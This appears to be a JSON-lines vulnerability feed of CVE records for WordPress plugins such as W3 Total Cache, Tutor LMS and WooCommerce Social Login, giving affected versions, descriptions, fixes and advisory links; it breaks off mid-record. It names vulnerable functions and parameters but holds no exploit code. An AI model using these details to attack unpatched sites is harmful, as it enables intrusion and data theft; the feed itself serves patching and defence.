{"CVE_ID":"CVE-2023-5359","slug":"w3-total-cache","versionImpact":"2.7.5","versionEndExcluding":"2.7.6","description":"The W3 Total Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.5 via Google OAuth API secrets stored in plaintext in the publicly visible plugin source. This can allow unauthenticated attackers to impersonate W3 Total Cache and gain access to user account information in successful conditions. This would not impact the WordPress users site in any way.","recommendation":"Update to version 2.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d89a534-978e-4fd8-be3a-5137bdc22dc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d89a534-978e-4fd8-be3a-5137bdc22dc9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/trunk\\\/PageSpeed_Api.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/trunk\\\/PageSpeed_Api.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156426\\\/w3-total-cache\\\/tags\\\/2.7.6\\\/PageSpeed_Api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156426\\\/w3-total-cache\\\/tags\\\/2.7.6\\\/PageSpeed_Api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4652","slug":"video-background","versionEndExcluding":"2.7.5","description":"The Video Background WordPress plugin before 2.7.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebf3df99-6939-4ae9-ad55-004f33c1cfbc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebf3df99-6939-4ae9-ad55-004f33c1cfbc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13697","slug":"bp-better-messages","versionImpact":"2.7.4","versionEndExcluding":"2.7.5","description":"The Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.7.4 via the 'nice_links'. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Successful exploitation requires the \"Enable link previews\" to be enabled (default).","recommendation":"Update to version 2.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243180\\\/bp-better-messages\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243180\\\/bp-better-messages\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b67710d7-976b-4a65-bad3-091a97aceb00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b67710d7-976b-4a65-bad3-091a97aceb00?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2701","slug":"gravityforms","versionEndExcluding":"2.7.5","description":"The Gravity Forms WordPress plugin before 2.7.5 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high-privileged users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298fbe34-62c2-4e56-9bdb-90da570c5bbe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298fbe34-62c2-4e56-9bdb-90da570c5bbe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2919","slug":"tutor","versionImpact":"2.7.4","versionEndExcluding":"2.7.5","description":"The Tutor LMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.4. This is due to missing or incorrect nonce validation on the 'addon_enable_disable' function. This makes it possible for unauthenticated attackers to enable or disable addons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/992abd72-2a8e-4bda-94c2-4a7f88487906?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/992abd72-2a8e-4bda-94c2-4a7f88487906?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148621\\\/tutor\\\/tags\\\/2.7.5\\\/classes\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148621\\\/tutor\\\/tags\\\/2.7.5\\\/classes\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Ajax.php?rev=3128650#L506\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Ajax.php?rev=3128650#L506\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13702","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.7.4","versionEndExcluding":"2.7.5","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vCitaMeetingScheduler' and 'vCitaSchedulingCalendar' shortcodes in all versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3256449%40crm-customer-relationship-management-by-vcita&new=3256449%40crm-customer-relationship-management-by-vcita&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3256449%40crm-customer-relationship-management-by-vcita&new=3256449%40crm-customer-relationship-management-by-vcita&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5d3239b-0f65-46f7-977b-9995542a6eb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5d3239b-0f65-46f7-977b-9995542a6eb9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10312","slug":"exclusive-addons-for-elementor","versionImpact":"2.7.4","versionEndExcluding":"2.7.5","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.4 via the render function in elements\/tabs\/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 2.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc931943-13f3-4ab1-b70f-c234253ca269?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc931943-13f3-4ab1-b70f-c234253ca269?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175285\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175285\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8658","slug":"mycred","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The myCred \u2013 Loyalty Points and Rewards plugin for WordPress and WooCommerce \u2013 Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mycred_update_database() function in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to upgrade an out of date database.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20be9a37-9e9f-4791-a27c-e0db007be787?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20be9a37-9e9f-4791-a27c-e0db007be787?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156989\\\/mycred\\\/trunk\\\/includes\\\/mycred-database-upgrade.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156989\\\/mycred\\\/trunk\\\/includes\\\/mycred-database-upgrade.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9345","slug":"product-delivery-date-for-woocommerce-lite","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The Product Delivery Date for WooCommerce \u2013 Lite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable when notices are present.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1127a5f3-1698-45e9-85bd-4eebfdbe56d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1127a5f3-1698-45e9-85bd-4eebfdbe56d4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/-2.7.3\\\/includes\\\/component\\\/pro-notices-in-lite\\\/ts-pro-notices.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/-2.7.3\\\/includes\\\/component\\\/pro-notices-in-lite\\\/ts-pro-notices.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161353\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/2.7.4\\\/includes\\\/component\\\/pro-notices-in-lite\\\/ts-pro-notices.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161353\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/2.7.4\\\/includes\\\/component\\\/pro-notices-in-lite\\\/ts-pro-notices.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0820","slug":"job-postings","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The Jobs for WordPress plugin before 2.7.4 does not sanitise and escape some parameters, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc091bbd-7338-4bd4-add5-e46502a9a949\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc091bbd-7338-4bd4-add5-e46502a9a949\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6637","slug":"woo-social-login","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to unauthenticated privilege escalation in all versions up to, and including, 2.7.3. This is due to a lack of brute force controls on a weak one-time password. This makes it possible for unauthenticated attackers to brute force the one-time password for any user, except an Administrator, if they know the email of user.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10d92d5e-1c23-4f6a-bfab-0756876190a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10d92d5e-1c23-4f6a-bfab-0756876190a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6636","slug":"woo-social-login","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'woo_slg_login_email' function in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to change the default role to Administrator while registering for an account.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77ea4ba8-6c13-494a-92e3-12643003635b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77ea4ba8-6c13-494a-92e3-12643003635b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6635","slug":"woo-social-login","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.7.3. This is due to insufficient controls in the 'woo_slg_login_email' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, excluding an administrator, if they know the email of user.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37836722-eb25-4393-8cdf-91057642ba3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37836722-eb25-4393-8cdf-91057642ba3f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4280","slug":"white-label-cms","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The White Label CMS plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_plugin function in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to reset plugin settings.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13a206ea-0890-4535-9da7-54a7a45f0452?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13a206ea-0890-4535-9da7-54a7a45f0452?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082887\\\/white-label-cms\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082887\\\/white-label-cms\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13314","slug":"wp-carousel-free","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The Carousel, Slider, Gallery by WP Carousel  WordPress plugin before 2.7.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae234bbe-a4af-49f5-8e0a-4fb960821e05\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae234bbe-a4af-49f5-8e0a-4fb960821e05\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5537","slug":"foobox-image-lightbox","versionImpact":"2.7.34","versionEndExcluding":"2.7.35","description":"The Lightbox & Modal Popup WordPress Plugin \u2013 FooBox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alternative texts in all versions up to, and including, 2.7.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3322273%40foobox-image-lightbox&new=3322273%40foobox-image-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3322273%40foobox-image-lightbox&new=3322273%40foobox-image-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5fd2163-b8ef-4dd1-a12b-cd9187145134?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5fd2163-b8ef-4dd1-a12b-cd9187145134?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5668","slug":"foobox-image-lightbox","versionImpact":"2.7.28","versionEndExcluding":"2.7.32","description":"The Lightbox & Modal Popup WordPress Plugin \u2013 FooBox plugin for WordPress is vulnerable to DOM-based Stored Cross-Site Scripting via HTML data attributes in all versions up to, and including, 2.7.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/923f9e66-2e26-4ec2-a4b3-439881a6ca10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/923f9e66-2e26-4ec2-a4b3-439881a6ca10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130678\\\/foobox-image-lightbox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130678\\\/foobox-image-lightbox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4645","slug":"ad-inserter","versionImpact":"2.7.30","versionEndExcluding":"2.7.31","description":"The Ad Inserter for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.30 via the ai_ajax function. This can allow unauthenticated attackers to extract sensitive data such as post titles and slugs (including those of protected posts along with their passwords), usernames, available roles, the plugin license key provided the remote debugging option is enabled. In the default state it is disabled.","recommendation":"Update to version 2.7.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57b3eef3-e165-45ac-89d7-2a2a6529b310?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57b3eef3-e165-45ac-89d7-2a2a6529b310?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ad-inserter\\\/trunk\\\/ad-inserter.php#L6529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ad-inserter\\\/trunk\\\/ad-inserter.php#L6529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969942%40ad-inserter%2Ftags%2F2.7.31&old=2922718%40ad-inserter%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969942%40ad-inserter%2Ftags%2F2.7.31&old=2922718%40ad-inserter%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4668","slug":"ad-inserter","versionImpact":"2.7.30","versionEndExcluding":"2.7.31","description":"The Ad Inserter for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.30 via the ai-debug-processing-fe URL parameter. This can allow unauthenticated attackers to extract sensitive data including installed plugins (present and active), active theme, various plugin settings, WordPress version, as well as some server settings such as memory limit, installation paths.","recommendation":"Update to version 2.7.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce457c98-c55b-4b71-a80b-393eceb9effd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce457c98-c55b-4b71-a80b-393eceb9effd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969942%40ad-inserter%2Ftags%2F2.7.31&old=2922718%40ad-inserter%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969942%40ad-inserter%2Ftags%2F2.7.31&old=2922718%40ad-inserter%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5784","slug":"tutor-pro","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Tutor LMS  Pro plugin for WordPress is vulnerable to unauthorized administrative actions execution due to a missing capability checks on multiple functions like treport_quiz_atttempt_delete and tutor_gc_class_action in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with the subscriber-level access and above, to preform an administrative actions on the site, like comments, posts or users deletion, viewing notifications, etc.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5c23ed-7239-40e1-a795-1ae8d4c2d6c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5c23ed-7239-40e1-a795-1ae8d4c2d6c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tutorlms.com\\\/releases\\\/id\\\/299\\\/\",\"name\":\"https:\\\/\\\/tutorlms.com\\\/releases\\\/id\\\/299\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3897","slug":"eucookielaw","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The EUCookieLaw plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.7.2 via the 'file_get_contents' function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. The vulnerability can only be exploited if a caching plugin such as W3 Total Cache is installed and activated.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eucookielaw\\\/trunk\\\/templates\\\/EUCookieCache.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eucookielaw\\\/trunk\\\/templates\\\/EUCookieCache.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288917\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d360de79-8490-4e70-b2d9-4f01a1ed3305?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d360de79-8490-4e70-b2d9-4f01a1ed3305?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5324","slug":"easy-login-woocommerce","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Login\/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_settings' function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-login-woocommerce\\\/trunk\\\/includes\\\/xoo-framework\\\/admin\\\/class-xoo-admin-settings.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-login-woocommerce\\\/trunk\\\/includes\\\/xoo-framework\\\/admin\\\/class-xoo-admin-settings.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093994\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093994\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5665","slug":"easy-login-woocommerce","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Login\/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \u2018export_settings\u2019 function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary options on affected sites.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a304e9a-9518-4a6a-b36a-963cb329f5c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a304e9a-9518-4a6a-b36a-963cb329f5c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-login-woocommerce\\\/trunk\\\/includes\\\/xoo-framework\\\/admin\\\/class-xoo-admin-settings.php?rev=3084943#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-login-woocommerce\\\/trunk\\\/includes\\\/xoo-framework\\\/admin\\\/class-xoo-admin-settings.php?rev=3084943#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093994\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3093994\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3495","slug":"country-state-city-auto-dropdown","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the \u2018cnt\u2019 and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.7.3, or a newer patched 